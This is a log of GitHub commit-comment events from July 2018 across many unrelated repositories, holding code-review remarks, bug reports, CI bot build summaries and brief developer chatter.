{"id":"7966230618","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710292,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T19:14:40Z","updated_at":"2018-07-14T19:14:40Z","author_association":"CONTRIBUTOR","body":"I'd be happy to kick in a few pennies toward some ARM testing, since it's my fault this is even coming up. I'm interested in contributing however I can toward a solution, both because it's something I \"broken\" because I think I may still pursue a change that allows polling for multiple events at once to cut down on the number of native calls we end up making under load. (We're still working on a changeover from Java's `ProcessBuilder` to NuProcess, for Bitbucket Server, and load testing is one of the next steps in that work.)"}},"created_at":"2018-07-14T19:14:40Z"}
{"id":"7966231290","type":"CommitCommentEvent","actor":{"login":"Jenariasha"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29710294,"position":null,"line":null,"path":null,"commit_id":"485efde6bb8e49689f08ab06ff6a598ab81e3647","created_at":"2018-07-14T19:15:13Z","updated_at":"2018-07-14T19:15:13Z","author_association":"COLLABORATOR","body":"Noob"}},"created_at":"2018-07-14T19:15:13Z"}
{"id":"7966232441","type":"CommitCommentEvent","actor":{"login":"AndrewBelt"},"repo":{"name":"VCVRack/Rack"},"payload":{"comment":{"id":29710298,"position":null,"line":null,"path":null,"commit_id":"23f14c9f8c0d03dcc6f3e6d5ca6a982a541698cd","created_at":"2018-07-14T19:16:02Z","updated_at":"2018-07-14T19:16:02Z","author_association":"MEMBER","body":"Tagged"}},"created_at":"2018-07-14T19:16:02Z"}
{"id":"7966237086","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812au-1"},"payload":{"comment":{"id":29710304,"position":null,"line":null,"path":null,"commit_id":"9175cd68dbf383f27a178b054ba3369e93d4a00b","created_at":"2018-07-14T19:19:50Z","updated_at":"2018-07-14T19:19:50Z","author_association":"NONE","body":"8821au works again, and this time injection also works again.. AWESOME! <3"}},"created_at":"2018-07-14T19:19:50Z"}
{"id":"7966237160","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29710305,"position":null,"line":null,"path":null,"commit_id":"996017a2ac087b25a84063b8206e1d56df6e1b22","created_at":"2018-07-14T19:19:53Z","updated_at":"2018-07-14T19:19:53Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-150](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-150).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-150-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T19:19:53Z"}
{"id":"7966237199","type":"CommitCommentEvent","actor":{"login":"mtshields1"},"repo":{"name":"mtshields1/Snip-it"},"payload":{"comment":{"id":29710306,"position":null,"line":null,"path":null,"commit_id":"53d76fb9aa9f168f4424089239773675d42029ed","created_at":"2018-07-14T19:19:55Z","updated_at":"2018-07-14T19:19:55Z","author_association":"OWNER","body":"A few objectives were completed with this push:\r\n1. Reset DB data on Firebase\r\n2. Along with resetting the DB data, the process of user addition to the DB was reworked; Firebase can add children with UUIDs automatically added. Now when users are added, the Firebase DB UUID that user will be under is saved with that user object\r\n3. General comment and import cleanup\r\n4. UserHomePage now successfully displays the user's username"}},"created_at":"2018-07-14T19:19:55Z"}
{"id":"7966237551","type":"CommitCommentEvent","actor":{"login":"LucasDinoPlayzYT"},"repo":{"name":"JurassiCraftTeam/JurassiCraft2"},"payload":{"comment":{"id":29710307,"position":7,"line":25,"path":"src/main/java/org/jurassicraft/JurassiCraft.java","commit_id":"08e4e5090d923ec22de1888cd7108ab7d000e0c0","created_at":"2018-07-14T19:20:13Z","updated_at":"2018-07-14T19:20:13Z","author_association":"NONE","body":"**Whenever I loaded it, it said \"LLibrary is missing mods it depends on. Include the following mod or delete LLibrary.\" Then it shows the mod which says forge 14.23.3.2655 or above. Do you think you know how to help me with that?**"}},"created_at":"2018-07-14T19:20:13Z"}
{"id":"7966237734","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29710309,"position":null,"line":null,"path":null,"commit_id":"9f0c2fc45a7152b0f1786cfddba45e2969ffce0c","created_at":"2018-07-14T19:20:21Z","updated_at":"2018-07-14T19:20:21Z","author_association":"OWNER","body":"Build version: __`2.2.0-perf-safe.64`__ :crossed_fingers: [`perf-safe`](https://github.com/streamich/nano-css/tree/perf-safe) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/64) :tada:"}},"created_at":"2018-07-14T19:20:21Z"}
{"id":"7966239267","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"donc1everon/Algorithm"},"payload":{"comment":{"id":29710312,"position":null,"line":null,"path":null,"commit_id":"8ba318492a2b82fd5885f928f395e28a6ccff363","created_at":"2018-07-14T19:21:43Z","updated_at":"2018-07-14T19:21:43Z","author_association":"NONE","body":"Отличное решение. Даже проверка есть."}},"created_at":"2018-07-14T19:21:43Z"}
{"id":"7966247833","type":"CommitCommentEvent","actor":{"login":"LOCRCCG"},"repo":{"name":"LOCRCCG/RCCG-L.O.C-WORKER-S-ATTENDANCE"},"payload":{"comment":{"id":29710326,"position":null,"line":null,"path":null,"commit_id":"de8c8661392a3bf689c8a3f6635a3503c7e920c4","created_at":"2018-07-14T19:28:47Z","updated_at":"2018-07-14T19:28:47Z","author_association":"OWNER","body":"[Attendance JANUARY 2018.docx](https://github.com/LOCRCCG/RCCG-L.O.C-WORKER-S-ATTENDANCE/files/2195196/Attendance.JANUARY.2018.docx)\r\n"}},"created_at":"2018-07-14T19:28:47Z"}
{"id":"7966248616","type":"CommitCommentEvent","actor":{"login":"ericberman"},"repo":{"name":"ericberman/MyFlightbookiOS"},"payload":{"comment":{"id":29710327,"position":null,"line":null,"path":null,"commit_id":"f94eff8ebae66df3c5084028ed584c9875609b16","created_at":"2018-07-14T19:29:29Z","updated_at":"2018-07-14T19:29:29Z","author_association":"OWNER","body":"Note this is the first one POST reviewed update."}},"created_at":"2018-07-14T19:29:29Z"}
{"id":"7966248748","type":"CommitCommentEvent","actor":{"login":"ashot123"},"repo":{"name":"ashot123/CRUD8"},"payload":{"comment":{"id":29710328,"position":null,"line":null,"path":null,"commit_id":"a9a3fc1c7164026b47a7d641a05229123c16a9ca","created_at":"2018-07-14T19:29:36Z","updated_at":"2018-07-14T19:29:36Z","author_association":"OWNER","body":"we need to remove."}},"created_at":"2018-07-14T19:29:36Z"}
{"id":"7966249587","type":"CommitCommentEvent","actor":{"login":"lonesome-data"},"repo":{"name":"lonesome-data/lonesome-data.github.io"},"payload":{"comment":{"id":29710331,"position":null,"line":null,"path":null,"commit_id":"feadb951dbbc1debbebff577ac62e022b9e02023","created_at":"2018-07-14T19:30:17Z","updated_at":"2018-07-14T19:30:17Z","author_association":"OWNER","body":"add file to repo"}},"created_at":"2018-07-14T19:30:17Z"}
{"id":"7966250807","type":"CommitCommentEvent","actor":{"login":"Jay-Jay-OPL"},"repo":{"name":"ps2dev/ps2sdk"},"payload":{"comment":{"id":29710335,"position":null,"line":null,"path":null,"commit_id":"587cad4c51b53ce80e9f7521facb3e31031e83df","created_at":"2018-07-14T19:31:14Z","updated_at":"2018-07-14T19:31:14Z","author_association":"NONE","body":"@sp193 I just wanted to report that I think this PS2SDK commit: 587cad4 (Jul 13, 2018) broke OPL (ifcaro repo 1085-Beta-4b9eff4) from running.\r\n\r\nThe last PS2SDK commit that works is this: **f569e3d** (Jul 11, 2018).\r\n\r\nI then tested a few other PS2SDK commits and here is my report:\r\n```\r\n//tested ps2sdk commits:\r\ndb7098a (Jul 14, 2018) = COMPILES BUT FAILS TO RUN OPL\r\nebabf0f (Jul 14, 2018) = COMPILES BUT FAILS TO RUN OPL\r\n587cad4 (Jul 13, 2018) = COMPILES BUT FAILS TO RUN OPL\r\nf569e3d (Jul 11, 2018) = GOOD\r\n78ba532 (Jul 9, 2018) = GOOD\r\n22acb18 (Jul 4, 2018 ) = FAILS TO COMPILE OPL -- SHOOTS OUT ERROR\r\n9b69633 (Jul 2, 2018) = GOOD\r\n93f6aad (Jun 28, 2018) = GOOD\r\n```\r\nLet me know if you have any questions or suggestions?  \r\n\r\nNOTE: I use a Windows Compiling Environment.  Here is the guide I follow: http://www.ps2-home.com/forum/viewtopic.php?f=50&t=169\r\n\r\nNOTE 2: I used wLE v4.43a Jul 4, 2018 commit: 59a4962 to run OPL's ELF from either MASS or MC."}},"created_at":"2018-07-14T19:31:14Z"}
{"id":"7966250988","type":"CommitCommentEvent","actor":{"login":"Andrey618"},"repo":{"name":"Andrey618/github.io"},"payload":{"comment":{"id":29710336,"position":null,"line":null,"path":null,"commit_id":"d9d0af787a102ac4cf0fc249f4de3a1e5da2611c","created_at":"2018-07-14T19:31:24Z","updated_at":"2018-07-14T19:31:24Z","author_association":"OWNER","body":"Comments..."}},"created_at":"2018-07-14T19:31:24Z"}
{"id":"7966251224","type":"CommitCommentEvent","actor":{"login":"InitialFail"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29710337,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-14T19:31:35Z","updated_at":"2018-07-14T19:31:35Z","author_association":"OWNER","body":"People still use this? Well then.\r\n\r\nI think you can spawn more by just opening more tabs. If that doesn't work, then you can try opening each bot in a separate Chrome user data directory."}},"created_at":"2018-07-14T19:31:35Z"}
{"id":"7966253797","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29710338,"position":null,"line":null,"path":null,"commit_id":"c6ad52db284d8f4bb3e0941fcacc4c360109f729","created_at":"2018-07-14T19:33:46Z","updated_at":"2018-07-14T19:33:46Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-153](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-153).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-153-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T19:33:46Z"}
{"id":"7966254411","type":"CommitCommentEvent","actor":{"login":"Crayonz96"},"repo":{"name":"Crayonz96/hello_world"},"payload":{"comment":{"id":29710339,"position":null,"line":null,"path":null,"commit_id":"70e19e1e39b1bb181039328275f618ec7a10b2ba","created_at":"2018-07-14T19:34:17Z","updated_at":"2018-07-14T19:34:17Z","author_association":"OWNER","body":"First sample commit"}},"created_at":"2018-07-14T19:34:17Z"}
{"id":"7966254822","type":"CommitCommentEvent","actor":{"login":"kanielyaniel"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29710340,"position":null,"line":null,"path":null,"commit_id":"4682a775ee8f443eb151744ad2b097910a5daced","created_at":"2018-07-14T19:34:38Z","updated_at":"2018-07-14T19:34:38Z","author_association":"MEMBER","body":"stop"}},"created_at":"2018-07-14T19:34:38Z"}
{"id":"7966256983","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29710342,"position":null,"line":null,"path":null,"commit_id":"1087f29f6f249a9246767c696b718d5001a75ca1","created_at":"2018-07-14T19:36:29Z","updated_at":"2018-07-14T19:36:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-135](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-135).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-135-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T19:36:29Z"}
{"id":"7966259957","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710344,"position":null,"line":null,"path":null,"commit_id":"282293816e73aa87ad7c040929800293a11ebaad","created_at":"2018-07-14T19:39:08Z","updated_at":"2018-07-14T19:39:08Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - Win64-Windows-7-VisualStudio-14: Tests Failed (2491 of 2936 tests passed, 90 test warnings)\n\nMessages:\n\n * 526 tests had: EIO diffs.\n * 327 tests had: ESO big diffs.\n * 194 tests had: ESO small diffs.\n * 131 tests had: Table small diffs.\n * 125 tests had: SSZ small diffs.\n * 86 tests had: ZSZ small diffs.\n * 368 tests had: Table big diffs.\n * 100 tests had: AUD diffs.\n * 85 tests had: MTR big diffs.\n * 81 tests had: MTR small diffs.\n * 101 tests had: ZSZ big diffs.\n * 43 tests had: ERR diffs.\n * 15 tests had: SSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 178\n * Failed: 445\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-282293816e73aa87ad7c040929800293a11ebaad-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-282293816e73aa87ad7c040929800293a11ebaad-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.84%25-red.png)</a> \n"}},"created_at":"2018-07-14T19:39:08Z"}
{"id":"7966260190","type":"CommitCommentEvent","actor":{"login":"tom-sqlprosolutions"},"repo":{"name":"tom-sqlprosolutions/hello-source-control"},"payload":{"comment":{"id":29710345,"position":null,"line":null,"path":null,"commit_id":"afc1dff5dfd355b74ccca9490b5dbb55aa3d9e5f","created_at":"2018-07-14T19:39:18Z","updated_at":"2018-07-14T19:39:18Z","author_association":"OWNER","body":"And I definitely want more practice Cherry picking. I also need to be more consistent in at least echoing to a log what steps I am taking."}},"created_at":"2018-07-14T19:39:18Z"}
{"id":"7966260567","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29710346,"position":null,"line":null,"path":null,"commit_id":"cef66e61ffea97c25c71aaa26eda86f249da7474","created_at":"2018-07-14T19:39:34Z","updated_at":"2018-07-14T19:39:34Z","author_association":"NONE","body":"I agree"}},"created_at":"2018-07-14T19:39:34Z"}
{"id":"7966260572","type":"CommitCommentEvent","actor":{"login":"DavidGZ"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29710347,"position":45,"line":1943,"path":"sys/usb/src.km/ucd/netusbee/isp116x-hcd.c","commit_id":"c2d4feb3ce8b5bb59411411b6b7bd18139da7110","created_at":"2018-07-14T19:39:35Z","updated_at":"2018-07-14T19:39:35Z","author_association":"MEMBER","body":"The NetUSBee driver for TOS works on 000, 030 and 060. The NetUSBee driver for MiNT only works for the 060.\r\nI hope I can fix this sometime, but I don't promise anything, I've spent a lot of time on this driver and I'm a little bit burn out about it :-D"}},"created_at":"2018-07-14T19:39:35Z"}
{"id":"7966263096","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29710348,"position":null,"line":null,"path":null,"commit_id":"8c4bca527159d8c3143a67074fec39f7c8299d41","created_at":"2018-07-14T19:41:43Z","updated_at":"2018-07-14T19:41:43Z","author_association":"MEMBER","body":"Of course it is preserved. I don't remember the option from top of my head, it's something like `git log --follow` or so."}},"created_at":"2018-07-14T19:41:43Z"}
{"id":"7966263451","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710349,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T19:42:01Z","updated_at":"2018-07-14T19:42:01Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-14T19:42:01Z"}
{"id":"7966264133","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29710350,"position":38,"line":38,"path":"src/main/java/com/crud/tasks/service/SimpleMailService.java","commit_id":"f618fff0d3175907aebe8b4da911aa5b7fd6cfdd","created_at":"2018-07-14T19:42:37Z","updated_at":"2018-07-14T19:42:37Z","author_association":"NONE","body":"Jeśli metoda getToCc() zwróci nulla, wystąpi NullPointerException. Najpierw powinno być sprawdzenie czy wynik metody getToCc() jest różny od null"}},"created_at":"2018-07-14T19:42:37Z"}
{"id":"7966264325","type":"CommitCommentEvent","actor":{"login":"DerekK88"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29710351,"position":83,"line":2356,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-14T19:42:45Z","updated_at":"2018-07-14T19:42:45Z","author_association":"NONE","body":"It looks like you pass an unassigned reference to `inside` here.  I think this defualts to zero for g++ compilers (please correct me if I'm wrong).  In both calls to `normal_to_plane` -- lines 2356: https://github.com/stevengj/libctl/blob/9f09e79765f92345ad4f4f04136597b4f0e43f25/utils/geom.c#L2356 and 2376: https://github.com/stevengj/libctl/blob/9f09e79765f92345ad4f4f04136597b4f0e43f25/utils/geom.c#L2376 `in_quadrilateral` (last argument to `normal_to_plane`) would then be `0`, so it looks like quadrilateral checking (line 2347) gets skipped.  Is this the intended behavior?  My apologies if I am misunderstanding something!"}},"created_at":"2018-07-14T19:42:45Z"}
{"id":"7966265203","type":"CommitCommentEvent","actor":{"login":"Sakots2499"},"repo":{"name":"theKashey/react-queue"},"payload":{"comment":{"id":29710352,"position":99,"line":189,"path":"example/app.tsx","commit_id":"3e530cbbe4ab3baea825133c025c0317b30f04dd","created_at":"2018-07-14T19:43:20Z","updated_at":"2018-07-14T19:43:20Z","author_association":"NONE","body":"GO"}},"created_at":"2018-07-14T19:43:20Z"}
{"id":"7966265388","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710353,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T19:43:27Z","updated_at":"2018-07-14T19:43:27Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T19:43:27Z"}
{"id":"7966265402","type":"CommitCommentEvent","actor":{"login":"astrawmyer"},"repo":{"name":"astrawmyer/Self_Paced-Online"},"payload":{"comment":{"id":29710354,"position":null,"line":null,"path":null,"commit_id":"2ed8c14df1fb74350d2186ed606481e222bd23a1","created_at":"2018-07-14T19:43:27Z","updated_at":"2018-07-14T19:43:27Z","author_association":"OWNER","body":"meant completed part 3.."}},"created_at":"2018-07-14T19:43:27Z"}
{"id":"7966266598","type":"CommitCommentEvent","actor":{"login":"camfrog-142"},"repo":{"name":"camfrog-142/Mass-Malicious-Script-Dump"},"payload":{"comment":{"id":29710355,"position":null,"line":null,"path":null,"commit_id":"d27e8bc0e98a3ed0040ea4289fd0e25e685c4000","created_at":"2018-07-14T19:44:26Z","updated_at":"2018-07-14T19:44:26Z","author_association":"OWNER","body":"yes nıce "}},"created_at":"2018-07-14T19:44:26Z"}
{"id":"7966267283","type":"CommitCommentEvent","actor":{"login":"camfrog-142"},"repo":{"name":"camfrog-142/Mass-Malicious-Script-Dump"},"payload":{"comment":{"id":29710356,"position":null,"line":null,"path":null,"commit_id":"d27e8bc0e98a3ed0040ea4289fd0e25e685c4000","created_at":"2018-07-14T19:45:00Z","updated_at":"2018-07-14T19:45:00Z","author_association":"OWNER","body":"coming soon 2019 ovh 3 method "}},"created_at":"2018-07-14T19:45:00Z"}
{"id":"7966269140","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29710360,"position":null,"line":null,"path":null,"commit_id":"29fd6758d1356c07adbd2d7f62d9b0f618169e73","created_at":"2018-07-14T19:46:32Z","updated_at":"2018-07-14T19:46:32Z","author_association":"OWNER","body":"run-linked-program and type-map take strings not symbols"}},"created_at":"2018-07-14T19:46:32Z"}
{"id":"7966270751","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29710361,"position":null,"line":null,"path":null,"commit_id":"ef1dc9f9f85f32b4af8dec647a243c71792ca5cd","created_at":"2018-07-14T19:47:56Z","updated_at":"2018-07-14T19:47:56Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-137](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-137).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-137-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T19:47:56Z"}
{"id":"7966271721","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710363,"position":11,"line":73,"path":"_data/members.yml","commit_id":"c8248643a856a2587bb7c104d5d8804a9b420351","created_at":"2018-07-14T19:48:48Z","updated_at":"2018-07-14T19:48:48Z","author_association":"COLLABORATOR","body":"Start with double quotes: \"As a San Francisco...\r\n\r\nAlso, it's not clear what is the connection between being a San Francisco native and being drawn to interdisciplinarity. It seems like there are two different thoughts here that should be separated. I.e., \"I am a San Francisco native. As I am interested in....\""}},"created_at":"2018-07-14T19:48:48Z"}
{"id":"7966271989","type":"CommitCommentEvent","actor":{"login":"erangell"},"repo":{"name":"dschmenk/PLASMA"},"payload":{"comment":{"id":29710365,"position":null,"line":null,"path":null,"commit_id":"8f408c8bbb1582dbebd7d2cdb0f7389da059971a","created_at":"2018-07-14T19:49:04Z","updated_at":"2018-07-14T19:49:04Z","author_association":"NONE","body":"Thanks Dave for the feedback.  I was looking at this logic recently to help Henry detect 6522 chips on his new mockingboards and your method is more reliable than the Slotfinder code that I see you tried to recreate above."}},"created_at":"2018-07-14T19:49:04Z"}
{"id":"7966273361","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710366,"position":21,"line":83,"path":"_data/members.yml","commit_id":"c8248643a856a2587bb7c104d5d8804a9b420351","created_at":"2018-07-14T19:50:20Z","updated_at":"2018-07-14T19:50:20Z","author_association":"COLLABORATOR","body":"Close with double quotes: ...mixed-martial arts.\""}},"created_at":"2018-07-14T19:50:20Z"}
{"id":"7966274590","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29710367,"position":null,"line":null,"path":null,"commit_id":"b1b8e54a2135cd1ab4b094d0e44a5a972cbb1465","created_at":"2018-07-14T19:51:26Z","updated_at":"2018-07-14T19:51:26Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-11](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-11-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T19:51:26Z"}
{"id":"7966275437","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710368,"position":11,"line":73,"path":"_data/members.yml","commit_id":"c8248643a856a2587bb7c104d5d8804a9b420351","created_at":"2018-07-14T19:52:11Z","updated_at":"2018-07-14T19:52:11Z","author_association":"COLLABORATOR","body":"(to clarify: double-quotes if you want the links to work)"}},"created_at":"2018-07-14T19:52:11Z"}
{"id":"7966276685","type":"CommitCommentEvent","actor":{"login":"DavidGZ"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29710370,"position":null,"line":null,"path":null,"commit_id":"8c4bca527159d8c3143a67074fec39f7c8299d41","created_at":"2018-07-14T19:53:18Z","updated_at":"2018-07-14T19:53:18Z","author_association":"MEMBER","body":"Yes, it's preserve, I see it now. Before I tried with --follow but I couldn't see the old commits, I must have missed something."}},"created_at":"2018-07-14T19:53:18Z"}
{"id":"7966276810","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29710371,"position":null,"line":null,"path":null,"commit_id":"dc4f60a5af335b5e788bc6e7e2cf379516ae77e1","created_at":"2018-07-14T19:53:25Z","updated_at":"2018-07-14T19:53:25Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-158](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-158).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-158-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T19:53:25Z"}
{"id":"7966277533","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"ValidusOs-Devices/device_oneplus_sdm845-common"},"payload":{"comment":{"id":29710373,"position":null,"line":null,"path":null,"commit_id":"00af8802ae1168cc8d1b91d96c600ffd5bd2e7ef","created_at":"2018-07-14T19:54:03Z","updated_at":"2018-07-14T19:54:03Z","author_association":"MEMBER","body":"better revert https://github.com/ValidusOs-Devices/device_oneplus_sdm845-common/commit/9e5a4612fcd9aaa539c11e81bbdd3ccbd8d9c31d\r\nif you add this"}},"created_at":"2018-07-14T19:54:03Z"}
{"id":"7966277894","type":"CommitCommentEvent","actor":{"login":"shravik"},"repo":{"name":"shravik/100DaysOfMLCode"},"payload":{"comment":{"id":29710374,"position":null,"line":null,"path":null,"commit_id":"c37ebf7a47342745c0c334a3b11b4551cbb18d51","created_at":"2018-07-14T19:54:11Z","updated_at":"2018-07-14T19:54:11Z","author_association":"OWNER","body":"Day 4 - data_preprocess.py"}},"created_at":"2018-07-14T19:54:11Z"}
{"id":"7966279177","type":"CommitCommentEvent","actor":{"login":"samerton"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710378,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T19:55:13Z","updated_at":"2018-07-14T19:55:13Z","author_association":"MEMBER","body":"I'm honestly not sure, does it work if you switch back to the Default template to test? @baxandrei \r\n"}},"created_at":"2018-07-14T19:55:13Z"}
{"id":"7966279893","type":"CommitCommentEvent","actor":{"login":"dneustadt"},"repo":{"name":"FriendsOfShopware/FroshViewSnapshots"},"payload":{"comment":{"id":29710380,"position":15,"line":110,"path":"Resources/views/frontend/_public/src/js/view-snapshots.js","commit_id":"68538350023157954cb0363f2ba4e397dd737330","created_at":"2018-07-14T19:55:50Z","updated_at":"2018-07-14T19:55:50Z","author_association":"MEMBER","body":"💩 "}},"created_at":"2018-07-14T19:55:50Z"}
{"id":"7966280409","type":"CommitCommentEvent","actor":{"login":"craigbarnes"},"repo":{"name":"craigbarnes/lua-gumbo"},"payload":{"comment":{"id":29710383,"position":null,"line":null,"path":null,"commit_id":"733832370118e556bf2619958361a9000bfa5fd3","created_at":"2018-07-14T19:56:15Z","updated_at":"2018-07-14T19:56:15Z","author_association":"OWNER","body":"@daurnimator Do you know of any public Docker image for void-musl? I want to set up a GitLab CI test runner, but the only Docker image for Void seems to be the glibc variant."}},"created_at":"2018-07-14T19:56:15Z"}
{"id":"7966280453","type":"CommitCommentEvent","actor":{"login":"BueVest"},"repo":{"name":"liblouis/liblouis"},"payload":{"comment":{"id":29710384,"position":null,"line":null,"path":null,"commit_id":"ab6b08537148a1cf86751e4ee6d7cc129f017099","created_at":"2018-07-14T19:56:17Z","updated_at":"2018-07-14T19:56:17Z","author_association":"COLLABORATOR","body":"Ok, I see now how it should be properly done in the main loop before replacement. I will revert.\n\nPlease, excuse me. I am still trying to find my way around the source.\n\n"}},"created_at":"2018-07-14T19:56:17Z"}
